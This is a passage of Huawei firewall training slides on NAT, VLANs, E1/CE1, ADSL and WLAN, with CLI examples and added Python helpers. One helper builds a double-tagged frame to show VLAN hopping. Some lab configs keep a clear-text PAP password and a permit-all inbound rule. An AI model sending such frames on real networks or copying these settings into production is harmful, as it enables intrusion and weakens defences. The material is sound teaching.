policy source { source-address source-wildcard | ... }
policy destination { destination-address destination-wildcard | ... }
policy service service-set { service-set-name }
action { source-nat | no-nat }
address-group { number | name }
Contents

1. Introduction to Network Address Translation Technology
2. NAT Technology Based on the Source IP Address
3. NAT Technology Based on the Destination IP Address
4. Bidirectional NAT Technology
5. NAT Application Scenario Configuration
NAT Server (Internal Server)

In practice, external hosts need to reach a server, such as a Web server, on the internal network. An external host has no route to the internal address, so the internal server cannot be accessed directly. The NAT Server function selects a public network address to represent the internal server address.

Figure: Internet users in the Untrust zone send packets to destination IP address 202.202.1.1 (the public network address); after conversion the destination IP address is 192.168.1.1, the true address of the WWW server in the DMZ.

On the firewall, a dedicated public network address is configured for the internal server to represent its private network address. For Internet users, the Internet address configured on the firewall is the server address.
Configuration Based on NAT Server

In the system view:
nat server [ id ] zone zone-name protocol protocol-type global { global-address [ global-port ] | interface { interface-name | interface-type interface-number } } inside host-address [ host-port ] [ vrrp virtual-router-id ] [ no-reverse ] [ vpn-instance vpn-instance-name ]

NAT Server is a frequently used form of NAT based on the destination address. If the intranet deploys a server whose true IP address is a private network address, public network users can access this server by using a public network address. NAT Server is configured for this case, and the device forwards the packets that public network users send to this public network address to the intranet server.
Destination NAT

Figure: mobile terminal, base station, GGSN, GSR, firewall, WAP gateway.

When a mobile terminal accesses the wireless network and its default WAP gateway address is not consistent with the WAP gateway address of the local operator, a device can be deployed between the terminal and the WAP gateway to perform NAT. The device then automatically forwards the packets that the terminal wrongly sends to the default WAP gateway address to the correct WAP gateway.
Configuration Based on Destination NAT

In the system view, create the advanced ACL and enter the ACL view:
acl [ number ] acl-number [ vpn-instance vpn-instance-name ]
rule [ rule-id ] { deny | permit } protocol [ destination { destination-address destination-wildcard | any | address-set address-set-name } | destination-port { operator port1 [ port2 ] | port-set port-set-name } ] ...

In the system view, enter the security zone view and configure destination NAT:
firewall zone [ vpn-instance vpn-instance-name ] [ name ] zone-name
destination-nat acl-number address ip-address [ port port-number ]
Contents

1. Introduction to Network Address Translation Technology
2. NAT Technology Based on the Source IP Address
3. NAT Technology Based on the Destination IP Address
4. Bidirectional NAT Technology
5. NAT Application Scenario Configuration
Overview of Bidirectional NAT Technology

In the bidirectional NAT application scenario, when each of the two communicating sides accesses the other, the destination address it uses is not the true address but an address after NAT conversion. For applications such as the outbound direction, the inbound direction and the internal server, addresses are translated according to the requirements of one side.

Bidirectional NAT has the following scenarios:
The internal server and NAT inbound are used together.
The internal server and intrazone NAT are used together.
Interzone Bidirectional NAT

Figure: Internet users (public network address 2.2.2.5) in the Untrust zone access the Internet server by its public network address 202.20.1.5. The firewall translates the destination to the server's true IP address 192.168.1.1 in the DMZ (NAT Server) and the source to the private IP address 192.168.1.5 (NAT Inbound).

To simplify the configuration of the route from the server to the public network, the NAT Inbound configuration can be added on top of the NAT Server configuration.
Intrazone Bidirectional NAT

If both sides whose addresses need to be translated are in the same security zone, intrazone NAT is required.

Figure: in the Trust domain, intranet users 192.168.1.5 (user public network address 202.202.1.5) access the server 192.168.1.1 (server public network address 202.202.1.1) through the firewall.

In the intranet, when intranet users access the intranet server, NAT conversion by the firewall is required under certain conditions. If users access the server by using its domain name, the public network address of the server is used after DNS resolution. In this case, the communication between users and the server goes through the firewall.
Interzone Bidirectional NAT Configuration

NAT Server configuration
nat server [ id ] zone zone-name protocol protocol-type global { global-address [ global-port ] | interface { interface-name | interface-type interface-number } } inside host-address [ host-port ] [ vrrp virtual-router-id ] [ no-reverse ] [ vpn-instance vpn-instance-name ]

NAT Inbound configuration
nat address-group group-number [ group-name ] start-address end-address
nat-policy interzone zone-name1 zone-name2 { inbound | outbound }
policy [ policy-id ]
policy source { source-address source-wildcard | ... }
policy destination { destination-address destination-wildcard | ... }
policy service service-set { service-set-name }
action { source-nat | no-nat }
address-group { number | name }
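The translation tables behind the commands above are easier to reason about in code. The following is an added example, not Huawei code, that simulates the translations of this chapter in one place: No-PAT from a pool of three addresses (the fourth host is dropped, as on the many-to-many slide), NAPT on one public address with ports 7111 to 7113 and the reverse lookup for return traffic (the many-to-one slide), NAT Server for 202.20.1.5:80 -> 192.168.1.1:80, and the interzone bidirectional case in which the inbound source NAT pool is the private address 192.168.1.5, so the DMZ server replies to a local address and needs no route to the Internet user. All addresses and ports are constructed from the slides; port allocation is sequential for readability.

```python
"""Added example (not Huawei code): a simulator for the translations in this
chapter. Constructed addresses follow the slides: pool 155.133.87.1-3 for
No-PAT, 155.133.87.1 for NAPT (ports from 7111), NAT Server 202.20.1.5:80 ->
192.168.1.1:80 and an inbound pool of one private address, 192.168.1.5."""


class Nat:
    def __init__(self, pool, mode="napt", first_port=7111):
        self.pool, self.mode, self.next_port = list(pool), mode, first_port
        self.no_pat_map = {}   # inside address -> public address (No-PAT only)
        self.snat = {}         # (src, sport) -> (global, gport)
        self.reverse = {}      # (global, gport) -> (src, sport)
        self.servers = {}      # (global, gport) -> (inside, iport)   NAT Server

    def add_server(self, global_ip, global_port, inside_ip, inside_port):
        self.servers[(global_ip, global_port)] = (inside_ip, inside_port)

    def source_nat(self, src, sport):
        """Outbound flow: returns (global, gport), or None when the pool is used up."""
        if (src, sport) in self.snat:
            return self.snat[(src, sport)]
        if self.mode == "no-pat":
            if src not in self.no_pat_map:
                free = [g for g in self.pool if g not in self.no_pat_map.values()]
                if not free:
                    return None                       # pool exhausted: packet is discarded
                self.no_pat_map[src] = free[0]        # first come, first served
            mapped = (self.no_pat_map[src], sport)    # port is not translated
        else:
            mapped = (self.pool[0], self.next_port)   # one public address, fresh port
            self.next_port += 1
        self.snat[(src, sport)] = mapped
        self.reverse[mapped] = (src, sport)
        return mapped

    def translate_destination(self, src, sport, dst, dport):
        """Packet towards a translated address: NAT Server mapping first, then the
        reverse of a source-NAT flow. Returns the new 4-tuple or None."""
        if (dst, dport) in self.servers:
            return (src, sport) + self.servers[(dst, dport)]
        if (dst, dport) in self.reverse:
            return (src, sport) + self.reverse[(dst, dport)]
        return None

    def translate_server_reply(self, src, sport, dst, dport):
        """Reply from an internal server: its inside address becomes the global one."""
        for glob, inside in self.servers.items():
            if inside == (src, sport):
                return glob + (dst, dport)
        return None


def demo_no_pat():
    nat = Nat(["155.133.87.1", "155.133.87.2", "155.133.87.3"], mode="no-pat")
    return [nat.source_nat(f"192.168.1.{i}", 1024 + i) for i in range(1, 5)]   # 4th: None


def demo_napt():
    nat = Nat(["155.133.87.1"])
    flows = [nat.source_nat(f"192.168.1.{i}", 40000) for i in range(1, 4)]     # ports 7111..7113
    reply = nat.translate_destination("8.8.8.8", 53, "155.133.87.1", 7112)     # back to host 2
    return flows, reply


def demo_bidirectional():
    fw = Nat(["192.168.1.5"])                            # inbound pool: a private address
    fw.add_server("202.20.1.5", 80, "192.168.1.1", 80)   # NAT Server for the DMZ web server
    # Internet user 2.2.2.5 -> 202.20.1.5:80: destination NAT, then inbound source NAT
    src, sport, dst, dport = fw.translate_destination("2.2.2.5", 3333, "202.20.1.5", 80)
    src, sport = fw.source_nat(src, sport)
    seen_by_server = (src, sport, dst, dport)            # server needs no route to 2.2.2.5
    # Reply 192.168.1.1:80 -> 192.168.1.5:7111: undo both translations
    reply = fw.translate_destination("192.168.1.1", 80, src, sport)
    reply = fw.translate_server_reply(*reply)
    return seen_by_server, reply
```

Two things the simulator makes visible: a packet to a public address and port with no NAT Server entry and no matching reverse entry has no translation and is dropped, which is why unsolicited inbound traffic does not reach NAPT clients; and in the bidirectional case the server sees only 192.168.1.5, so server-side logs no longer show the real client address, the monitoring disadvantage named earlier in this chapter.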
Contents

1. Introduction to Network Address Translation Technology
2. NAT Technology Based on the Source IP Address
3. NAT Technology Based on the Destination IP Address
4. Bidirectional NAT Technology
5. NAT Application Scenario Configuration
NAT Application Scenario Analysis

Figure: a firewall with an Untrust zone (202.169.10.1/29), a DMZ (192.168.20.1/24) and a Trust zone (192.168.0.1/24).

Application scenario analysis:
NAT Outbound application
NAT Server application
Firewall NAT Outbound Configuration (Command Line)

Roadmap and examples for configuring outbound NAT

1. Configure the interzone packet filtering policy
[USG] policy interzone trust untrust outbound
[USG-policy-interzone-trust-untrust-outbound] policy 0
[USG-policy-interzone-trust-untrust-outbound-0] policy source 192.168.0.0 0.0.0.255
[USG-policy-interzone-trust-untrust-outbound-0] action permit

2. Configure the address pool
[USG] nat address-group 1 202.169.10.2 202.169.10.6

3. Configure the NAT outbound policy
[USG] nat-policy interzone trust untrust outbound
[USG-nat-policy-interzone-trust-untrust-outbound] policy 0
[USG-nat-policy-interzone-trust-untrust-outbound-0] policy source 192.168.0.0 0.0.0.255
[USG-nat-policy-interzone-trust-untrust-outbound-0] action source-nat
[USG-nat-policy-interzone-trust-untrust-outbound-0] address-group 1
Firewall NAT Outbound Configuration (Web)
Firewall NAT Server Configuration (Command Line)

Roadmap and examples for configuring the internal server

1. Configure the internal Web and FTP servers
[USG] nat server protocol tcp global 202.169.10.1 80 inside 192.168.20.2 8080
[USG] nat server protocol tcp global 202.169.10.1 ftp inside 192.168.20.3 ftp

2. Configure the interzone packet filtering rules
[USG] policy interzone dmz untrust inbound
[USG-policy-interzone-dmz-untrust-inbound] policy 0
[USG-policy-interzone-dmz-untrust-inbound-0] policy destination 192.168.20.2 0
[USG-policy-interzone-dmz-untrust-inbound-0] policy service service-set http
[USG-policy-interzone-dmz-untrust-inbound-0] action permit
[USG-policy-interzone-dmz-untrust-inbound] policy 1
[USG-policy-interzone-dmz-untrust-inbound-1] policy destination 192.168.20.3 0
[USG-policy-interzone-dmz-untrust-inbound-1] policy service service-set ftp
[USG-policy-interzone-dmz-untrust-inbound-1] detect ftp
[USG-policy-interzone-dmz-untrust-inbound-1] action permit

The packet filtering policy matches the translated (private) destination addresses, 192.168.20.2 and 192.168.20.3, not the global address. The detect ftp command enables ASPF for the FTP policy so that the data channel negotiated on the control channel is opened dynamically instead of by a permanent permit rule.
Firewall NAT Server Configuration (Web)
Summary

NAT technical principles
NAT application modes
Firewall NAT configuration
Questions

What is the difference between NAT inbound and NAT outbound?

Why does NAT based on the IP address not have a one-to-many application scenario?

What limitations does No-PAT have?

What is the application scenario of Easy IP?

What is the meaning of the no-reverse parameter in NAT based on the destination IP address?

What is the difference between the implementation mechanisms of NAT Server and destination NAT?

What is the difference between the interzone bidirectional NAT and intrazone bidirectional NAT application scenarios?

In different NAT application scenarios, what are the concerns in the configuration of interzone packet filtering rules?
Answer

Thank you

www.huawei.com

Chapter 5 Firewall Networking

www.huawei.com

Objectives

Upon completion of this course, you will be able to describe:

Basic VLAN technologies
SA and E1 WAN interface technologies
Basic ADSL technologies
WLAN and 3G wireless technologies

Contents

1. VLAN Feature Technology
2. SA and E1 Feature Technology
3. ADSL Feature Technology
4. WLAN Feature Technology
5. 3G Feature Technology

VLAN Background: Broadcast Storm

Figure: a single broadcast domain, in which every station receives every broadcast frame

Dividing Broadcast Domains by VLANs

Figure: Port 1 in VLAN-1 and Port 2 in VLAN-2, each VLAN forming its own broadcast domain

VLAN Frame Format

Standard Ethernet frame:
    DA | SA | TYPE | DATA | CRC

Ethernet frame with IEEE 802.1Q tag:
    DA | SA | TAG | TYPE | DATA | CRC

The 4-byte TAG is inserted between the source address and the Type field and consists of:
    TPID (2 bytes): 0x8100, identifies the frame as 802.1Q-tagged
    TCI (2 bytes): PRI (3 bits) | CFI (1 bit) | VLAN ID (12 bits)

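The tag layout above, parsed and built in code. This is an added example, not part of the Huawei training material: the frames are constructed inside the block, and the MAC addresses are placeholders. The double-tag check is included because it is the property a firewall or switch administrator cares about: a frame carrying two stacked tags, the outer one matching the native VLAN (PVID) of the receiving port, is the classic VLAN-hopping pattern that the trunk and hybrid configurations later in this section must guard against.

```python
"""Parse and build IEEE 802.1Q-tagged Ethernet frames (added example)."""
import struct

TPID_8021Q = 0x8100    # IEEE 802.1Q customer tag
TPID_8021AD = 0x88A8   # IEEE 802.1ad service tag (outer tag of a QinQ frame)


def build_frame(da: bytes, sa: bytes, vids, ethertype: int = 0x0800,
                payload: bytes = b"", pri: int = 0) -> bytes:
    """Build an Ethernet frame with zero or more 802.1Q tags (outer tag first)."""
    frame = bytes(da) + bytes(sa)
    for vid in vids:
        tci = (pri << 13) | (vid & 0x0FFF)          # CFI bit left at 0
        frame += struct.pack("!HH", TPID_8021Q, tci)
    return frame + struct.pack("!H", ethertype) + payload


def parse_frame(frame: bytes) -> dict:
    """Split a frame into DA, SA, the stacked VLAN tags (outer to inner),
    the final Ethertype and the payload."""
    if len(frame) < 14:
        raise ValueError("frame shorter than a minimal Ethernet header")
    da, sa = frame[0:6], frame[6:12]
    offset, tags = 12, []
    while True:
        (ethertype,) = struct.unpack("!H", frame[offset:offset + 2])
        if ethertype not in (TPID_8021Q, TPID_8021AD):
            break                                    # reached the real Ethertype
        if len(frame) < offset + 6:
            raise ValueError("truncated VLAN tag")
        (tci,) = struct.unpack("!H", frame[offset + 2:offset + 4])
        tags.append({"tpid": ethertype,
                     "pri": tci >> 13,               # 3-bit priority (802.1p)
                     "cfi": (tci >> 12) & 1,         # 1-bit CFI
                     "vid": tci & 0x0FFF})           # 12-bit VLAN ID
        offset += 4
    return {"da": da.hex(":"), "sa": sa.hex(":"), "tags": tags,
            "ethertype": ethertype, "payload": frame[offset + 2:]}


def is_double_tagged(frame: bytes) -> bool:
    """True when two or more tags are stacked. On an access port whose PVID
    equals the outer tag, the switch strips that tag and forwards the still
    tagged inner frame into another VLAN (VLAN hopping)."""
    return len(parse_frame(frame)["tags"]) >= 2


# constructed sample frames
BROADCAST = b"\xff" * 6
HOST_A = bytes.fromhex("001122334455")        # placeholder station MAC
IPV4_STUB = bytes(20)                          # stand-in for an IPv4 header
USER_FRAME = build_frame(BROADCAST, HOST_A, [100], payload=IPV4_STUB, pri=5)
HOPPING_FRAME = build_frame(BROADCAST, HOST_A, [1, 200], payload=IPV4_STUB)

if __name__ == "__main__":
    for name, f in (("user", USER_FRAME), ("hopping", HOPPING_FRAME)):
        p = parse_frame(f)
        print(name, [t["vid"] for t in p["tags"]], hex(p["ethertype"]),
              "double-tagged" if is_double_tagged(f) else "single-tagged")
```

Run it against captured frames (for example the bytes of a pcap record) to see which VLAN a frame claims; a frame from an access port that parses with two tags, the outer being VLAN 1, is exactly what the native-VLAN caveats on the trunk slides are about.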
Types of Ethernet Switch Ports

Access port
Generally, the access port is used to connect a user PC. An access port can belong to only one VLAN.

Trunk port
Generally, the trunk port is used for the connection between switches. A trunk port can belong to multiple VLANs and can receive and send packets of multiple VLANs.

Hybrid port
The hybrid port is used for the connection between switches or to user PCs. A hybrid port can belong to multiple VLANs and can receive and send packets of multiple VLANs.

What is the function of the default VLAN ID (PVID)?

Access-Link Configuration

By default, all the ports of the switch are access ports and belong to VLAN 1. That is, the PVID is 1.

Figure: Port 0/1 in VLAN 3, Port 0/2 in VLAN 3

Configure the port type:
    port link-type access

Create a VLAN:
    vlan 3

Add a port to the VLAN (in the VLAN view):
    port ethernet 0/1

Add the VLAN to a port (in the interface view):
    port access vlan 3

Trunk-Link Configuration

The trunk port is responsible for transmitting the data of multiple VLANs. By default, the PVID of the trunk port is 1.

Figure: Port 0/3 on each of two switches, connected by a trunk link

Configure the port type:
    port link-type trunk

Configure the VLANs whose packets can be transmitted over the trunk port:
    port trunk permit vlan all

Configure the PVID of the trunk port:
    port trunk pvid 1

Note: permitting all VLANs on a trunk and leaving its PVID at VLAN 1 is convenient in a lab. On a production switch, permit only the VLANs the trunk must carry and use a dedicated, otherwise unused VLAN as the PVID, so that an untagged or double-tagged frame from an access port in VLAN 1 cannot be forwarded into another VLAN over the trunk.

Hybrid-Link Configuration

The hybrid port is responsible for transmitting the data of multiple VLANs. It can determine, per VLAN, whether to strip the tag. By default, the PVID of the hybrid port is 1.

Figure: Port 0/3 on each of two switches, connected by a hybrid link

Configure the port type:
    port link-type hybrid

Configure the PVID and the VLANs whose packets can be transmitted over the hybrid port:
    port hybrid pvid 1
    port hybrid vlan 10 to 20 tagged

Routers Between VLANs

Figure: VLAN 100, VLAN 200 and VLAN 300 connected through a router

The packets of different VLANs cannot cross VLAN boundaries. Packets must be forwarded by a Layer 3 device from one VLAN to another.

SA Serial Port Overview

The serial port is a common WAN port. Serial ports are classified into synchronous serial ports and asynchronous serial ports; the synchronous serial port is widely used.

The SA interface is a synchronous serial interface and supports various cables such as V.24, V.35, X.21, RS-449 and RS-530. It supports various baud rates to satisfy different peer devices. The maximum bandwidth is 2.048 Mbit/s, which satisfies the data transmission requirements of carriers and enterprise customers.

The SA interface has two work modes: data terminal equipment (DTE) and data circuit-terminating equipment (DCE).

As an uplink interface, the SA interface can carry various services such as HTTP and FTP.

The SA interface supports various data link layer protocols, including the Point-to-Point Protocol (PPP) and High-Level Data Link Control (HDLC).

The SA interface supports the IP network layer protocol.

SA Serial Port Configuration Example (CLI)

The SA interface uses the PPP protocol.

Configure the USG2200A:
# Configure serial 1/0/0. Set the encapsulation protocol to PPP. Leave the other parameters at their default values.
<USG2200A> system-view
[USG2200A] interface serial 1/0/0
[USG2200A-serial1/0/0] ip address 10.110.1.11 255.255.255.0
[USG2200A-serial1/0/0] link-protocol ppp
[USG2200A-serial1/0/0] shutdown
[USG2200A-serial1/0/0] undo shutdown

Note: After the configuration is complete, add the serial 1/0/0 interface to a security zone and enable the default interzone packet filtering rules.

What Is the E1 Interface?

The E1 is a widely used low-speed WAN physical interface. It works at the bottom layer of the PDH rate hierarchy. It provides various application modes to support flexible low-speed access.

The E1 and T1 interfaces follow regional standards. The E1 interface complies with the ITU-T standards and is used in Europe and China. The T1 interface complies with the ANSI standard and is used in North America; Japan uses the closely related J1 variant.

The E1/T1 interface uses the time-division multiplexing (TDM) mechanism.

The E1/T1 interface supports various application modes: unchannelized (supported only by the E1 interface), channelized, partially channelized, and PRI.

The E1/T1 interface supports the following physical features: clock, encoding, frame format, frame synchronization, idle code, inter-frame filling, and loopback.

TDM Mechanism of the E1 Interface

In the E1 system, the frequency of the frame synchronization signal is 8 kHz. That is, 8000 frames are transmitted each second, and the sampling interval is 1 s / 8000 = 125 µs. Each 125 µs frame is divided into 32 timeslots, and each timeslot carries eight bits. The E1 interface rate is therefore 8000 x 32 x 8 = 2,048,000 bit/s.

Figure: basic PCM frame structure of the E1 interface (32 timeslots, TS0 to TS31)

E1 Related Concepts

Standard: The E1 standard is a European standard used in countries other than the USA, Canada and Japan; the E1 rate is 2.048 Mbit/s. The T1 standard is used in the USA, Canada and Japan. The E1 interface uses the PCM mechanism.

TDM: The E1 interface uses the TDM mechanism (the sampling interval is 125 µs). The E1 frame is divided into 32 equal timeslots, numbered 0 to 31. Each timeslot has eight bits, so a frame has 256 bits. 8000 frames are transmitted every second; therefore the E1 rate is 2.048 Mbit/s.

TS: TS is short for timeslot. A TS contains eight bits. A frame contains 32 TSs. A multiframe (MF) contains 16 frames.

TS0: TS0 is used to transmit the frame alignment signal (FAS), cyclic redundancy check 4 (CRC4) codes, and remote alarm indications.

TS16: TS16 is used to transmit channel associated signaling (CAS), the multiframe alignment signal, and multiframe remote alarm indications.

E1 Application Modes

    Unframed           -> Unchannelized (clear channel)
    Framed             -> Channelized, PCM31
    Framed multiframe  -> Channelized, PCM30

The unchannelized mode is also called clear channel mode.

The framed multiframe mode uses TS16 as the signaling channel and is mainly used to carry voice traffic such as ISDN PRI.

E1 Typical Networking: One-to-One Interconnection

Figure, three scenarios:
1. E1 -- Carrier SDH/PDH -- E1
2. E1 -- Carrier SDH/PDH -- Protocol converter -- Serial port
3. Serial port -- Protocol converter -- Carrier SDH/PDH -- Protocol converter -- Serial port

E1 Typical Networking: One-to-Many Interconnection

Figure, two scenarios:
1. Headquarters (E1, 2M) -- Carrier SDH/PDH -- Branch 1 (protocol converter to a serial port, 128K) and Branch 2 (E1, 512K)
2. Headquarters (cPOS, 155M) -- Carrier SDH/PDH -- Branch 1 (protocol converter to a serial port, 2M) and Branch 2 (E1, 2M)

Configuration Methods

Physical interface parameters (E1 or CE1):
    Enter the E1 interface view.
    Set the E1 or CE1 work mode.
    Configure the clock.
    Configure the line code (AMI/HDB3).
    Configure the frame format (CRC).
    Bind the timeslots of the channel (CE1).

Logical interface parameters:
    Configure the corresponding serial interface.
    Configure the link layer parameters, such as PPP or HDLC.
    Configure the network layer parameters, such as the IP address and routing protocol.

E1/CE1 Configuration Example (CLI Mode)

Physical interface configuration:
controller e1 9/0/0
 clock master
 code hdb3
 frame-format no-crc4
 using ce1
 channel-set 0 timeslot-list 1-4
 channel-set 1 timeslot-list 5-8
#

Logical interface configuration:
interface Serial9/0/0:0
 link-protocol ppp
 ip address 100.1.1.1 255.255.255.252
#
interface Serial9/0/0:1
 link-protocol ppp
 ip address 110.1.1.1 255.255.255.252
#
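The timeslot rules from the E1 slides, applied to the channel-set bindings above. This is an added example, not part of the Huawei training material: SAMPLE_CE1_CONFIG re-types the controller configuration from the example, BAD_CE1_CONFIG adds a deliberately wrong channel-set to exercise the checks, and the timeslot-list syntax (comma-separated numbers and ranges) is assumed from that example.

```python
"""Validate CE1 channel-set timeslot bindings (added example)."""
import re

TIMESLOT_RATE_KBPS = 8 * 8000 // 1000   # 8 bits x 8000 frames/s = 64 kbit/s
NUM_TIMESLOTS = 32
TS0, TS16 = 0, 16

SAMPLE_CE1_CONFIG = """\
controller e1 9/0/0
 clock master
 code hdb3
 frame-format no-crc4
 using ce1
 channel-set 0 timeslot-list 1-4
 channel-set 1 timeslot-list 5-8
#
"""

# constructed: a third channel-set that reuses TS0, TS16 and slots of sets 0 and 1
BAD_CE1_CONFIG = SAMPLE_CE1_CONFIG + " channel-set 2 timeslot-list 0,4-6,16\n"


def parse_timeslot_list(spec: str) -> set:
    """'1-4,7,9-10' -> {1, 2, 3, 4, 7, 9, 10}; rejects slots outside 0..31."""
    slots = set()
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        lo = int(lo)
        hi = int(hi) if hi else lo
        if not 0 <= lo <= hi < NUM_TIMESLOTS:
            raise ValueError(f"timeslot out of range: {part}")
        slots.update(range(lo, hi + 1))
    return slots


def check_channel_sets(config: str, pcm30: bool = False):
    """Return ({channel-set: bandwidth in kbit/s}, [problem strings]).
    TS0 is never usable for data; TS16 is reserved for CAS in PCM30 mode."""
    sets, problems = {}, []
    for m in re.finditer(r"channel-set\s+(\d+)\s+timeslot-list\s+(\S+)", config):
        idx, slots = int(m.group(1)), parse_timeslot_list(m.group(2))
        if TS0 in slots:
            problems.append(f"channel-set {idx}: TS0 carries frame alignment, not data")
        if pcm30 and TS16 in slots:
            problems.append(f"channel-set {idx}: TS16 carries CAS signaling in PCM30 mode")
        for other, used in sets.items():
            overlap = sorted(slots & used)
            if overlap:
                problems.append(f"channel-set {idx} overlaps channel-set {other} on TS {overlap}")
        sets[idx] = slots
    bandwidth = {idx: len(s) * TIMESLOT_RATE_KBPS for idx, s in sets.items()}
    return bandwidth, problems


if __name__ == "__main__":
    for name, cfg in (("sample", SAMPLE_CE1_CONFIG), ("bad", BAD_CE1_CONFIG)):
        bw, problems = check_channel_sets(cfg, pcm30=True)
        print(name, bw, *problems, sep="\n  ")
```

For the configuration above the check reports 256 kbit/s for each of Serial9/0/0:0 and Serial9/0/0:1 (four timeslots of 64 kbit/s each) and no problems; the constructed third channel-set is rejected for using TS0 and TS16 and for overlapping both existing sets.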

xDSL Overview: Asymmetric Digital Subscriber Line

In the asymmetric digital subscriber line, the data rate on the channel from the service provider end to the user end (downlink) and the data rate on the channel from the user end to the service provider end (uplink) are different.

A telephone line can carry both voice services and data services simultaneously. Using the existing PSTN infrastructure, the asymmetric digital subscriber line provides high-speed data transmission over the existing twisted-pair cables through a special modulation technology, without affecting the voice service. The major xDSL access technologies are:

ADSL/ADSL2/ADSL2+
VDSL/VDSL2
G.SHDSL (SHDSL series)

ADSL Overview

The ADSL2+ technology uses the existing twisted-pair cables to provide asymmetric transmission rates on the uplink and downlink.

The G.SHDSL/G.SHDSL.bis technology uses common twisted-pair cables to provide high-speed private line access services for users. It is mainly used for interconnection between small and medium enterprise networks, mobile base station trunks, and ISDN group access.

The VDSL2 broadband access technology is applicable to the private line interconnection and private line access used in hotel networks, high-speed network access for Internet cafes, and video conferencing.

ADSL2+ Model

Figure: ATU-R -- Splitter -- Twisted-pair cable -- Splitter -- Internet / PSTN

ADSL is an asymmetric DSL technology in which the uplink and downlink transmission rates differ. Uplink transmission is the transmission from the user end to the central office end, and downlink transmission is the transmission from the central office end to the user end.

ADSL Configuration Example 1 (CLI)

1. Configure the dialer interface.
<USG> system-view
[USG] dialer-rule 1 ip permit                # Define dialer rule 1: IP packets trigger dialing.
[USG] interface Dialer 1                     # Create the dialer interface and enter the dialer view.
[USG-Dialer1] dialer user USG                # Specify the name of the remote user who originates the dialing.
[USG-Dialer1] dialer bundle 1                # Specify the dialer bundle used by the dialer interface.
[USG-Dialer1] dialer-group 1                 # Configure the dialer group to which the Dialer 1 interface belongs.
[USG-Dialer1] link-protocol ppp              # Set the link layer protocol to PPP.
[USG-Dialer1] ip address ppp-negotiate       # Obtain the IP address through negotiation.
[USG-Dialer1] ppp ipcp dns admit-any         # Obtain the DNS address through negotiation.
[USG-Dialer1] ppp pap local-user Abcdefgh~ password simple Abcdefgh~   # Use PAP authentication. The user name and password are Abcdefgh~.
[USG-Dialer1] quit                           # Exit and go back to the system view.

Note: password simple keeps the PAP password in clear text in the configuration file. Use the cipher form of the command where the software supports it, and protect saved configuration files accordingly.

ADSL Configuration Example 2 (CLI)

2. Create the interface Virtual-Ethernet 1.
[USG] interface Virtual-Ethernet 1
[USG-Virtual-Ethernet1] quit

3. Configure the PVC of the interface Atm 2/0/0. Set the PVC encapsulation type to LLC.
[USG] interface Atm2/0/0
[USG-Atm2/0/0] pvc 8/35
[USG-Atm2/0/0-8/35] map bridge virtual-ethernet 1
[USG-Atm2/0/0-8/35] encapsulation llc

4. Configure the PPPoE session.
[USG] interface Virtual-Ethernet 1
[USG-Virtual-Ethernet1] pppoe-client dial-bundle-number 1

ADSL Configuration Example 3 (CLI)

5. Configure the Vlanif 1 interface and add it to the Trust zone.
[USG] interface Vlanif 1
[USG-Vlanif1] ip address 192.168.0.1 24
[USG-Vlanif1] quit
[USG] firewall zone trust
[USG-zone-trust] add interface Vlanif 1

6. Add the Dialer 1 interface to the Untrust zone.
[USG] firewall zone untrust
[USG-zone-untrust] add interface Dialer 1

7. For the USG series products, configure the interzone packet filter policies to ensure normal network transmission. For the USG BSR/HSR series products, skip this step.
[USG] policy interzone trust untrust inbound
[USG-policy-interzone-trust-untrust-inbound] policy 0
[USG-policy-interzone-trust-untrust-inbound-0] action permit

Note: policy 0 has no match condition, so it permits all inbound traffic from Untrust to Trust. That is acceptable for a lab; in production, restrict the inbound policy to the required sources, destinations and services.

ADSL Configuration Example 4 (CLI)

8. Configure NAT (Easy IP on the dialer interface).
[USG] nat-policy interzone trust untrust outbound
[USG-nat-policy-interzone-trust-untrust-outbound] policy 1
[USG-nat-policy-interzone-trust-untrust-outbound-1] action source-nat
[USG-nat-policy-interzone-trust-untrust-outbound-1] policy source 192.168.0.0 0.0.0.255
[USG-nat-policy-interzone-trust-untrust-outbound-1] easy-ip Dialer 1

9. Configure the default route.
[USG] ip route-static 0.0.0.0 0.0.0.0 Dialer 1

ADSL Configuration Example (Web)

WLAN Overview

The Wireless Local Area Network (WLAN) is a widely used technology in the communications industry. A WLAN is easy to deploy and use: during deployment you do not need to consider complex cabling and migration. The WLAN, however, is not a completely wireless system; the servers and the backbone network are still deployed on the fixed network, and only the users are mobile.

Carriers and enterprises can provide wireless LAN services using the WLAN solution. The services include:

Wireless LAN devices can be used to establish the wireless network. Users with wireless network cards can access the wireless network, the fixed network, or the Internet.
Wireless network users can access traditional 802.3 LANs.
Users can access the WLAN using different authentication and encryption modes to ensure security.
Seamless roaming with secure network access and a mobile area is provided for wireless network users.

In this course, WLAN, Wi-Fi and 802.11 refer to the same technology.

WLAN Security Overview

The wireless security features provided by the 802.11 protocol can defend against general network attacks, but attackers can still intrude into the wireless network. Therefore, the 802.11 protocol alone cannot comprehensively protect sensitive data, and a protocol with a stronger security mechanism is required.

The USG2000 system uses the WLAN security feature to enhance system security. The WLAN security feature uses the WLAN MAC to check the access security of 802.11 clients.

WLAN Basic Concepts

Wireless client (STA)
On a network, all the devices that connect to the wireless medium are called wireless clients. Each wireless client must have a wireless network card that supports the 802.11 standard. Wireless clients are classified into APs and clients.

Access point (AP)
The AP functions as a bridge between the wireless network user and the LAN. Frames are converted between wired transmission on the LAN side and wireless transmission on the user side. The USG2100/USG2200 can function as an AP.

Client
Clients include end devices such as laptops, personal digital assistants, IP phones, PCs, or workstations that are equipped with wireless network cards.

Wireless router
A wireless router is a router that provides the wireless access function, for example, a router that provides Layer 3 interfaces and functions as a Fat AP. All wireless clients can access the wired network, the fixed network, or the Internet through the wireless router. In this document, the Fat AP and the wireless router represent the same device (USG2100/USG2200).

WLAN Basic Concepts

Open system authentication
Open system authentication is the default authentication mechanism. It is also the simplest authentication algorithm, that is, no authentication at all. When the authentication mode is set to open system authentication, all clients are allowed to access the WLAN.

Shared key authentication
Shared key authentication is mainly applicable to pre-RSN devices. This authentication mode is used only when WEP encryption is enabled, and it exists for backward compatibility with legacy devices.

Wired Equivalent Privacy (WEP) encryption
WEP encryption was designed to protect the confidentiality of the data exchanged between authenticated users on the wireless LAN against interception. WEP is cryptographically broken and offers no real protection today; use it only where compatibility with legacy devices leaves no alternative.

TKIP encryption
TKIP encryption was introduced to improve on WEP for pre-RSN devices. TKIP is stronger than WEP but is itself deprecated in current 802.11 revisions.

Advanced Encryption Standard (AES) encryption
AES encryption (CCMP) is applicable only to RSNA clients. It uses AES in CCM mode, which combines counter (CTR) mode encryption with a CBC-MAC for integrity. This is the highest encryption level.

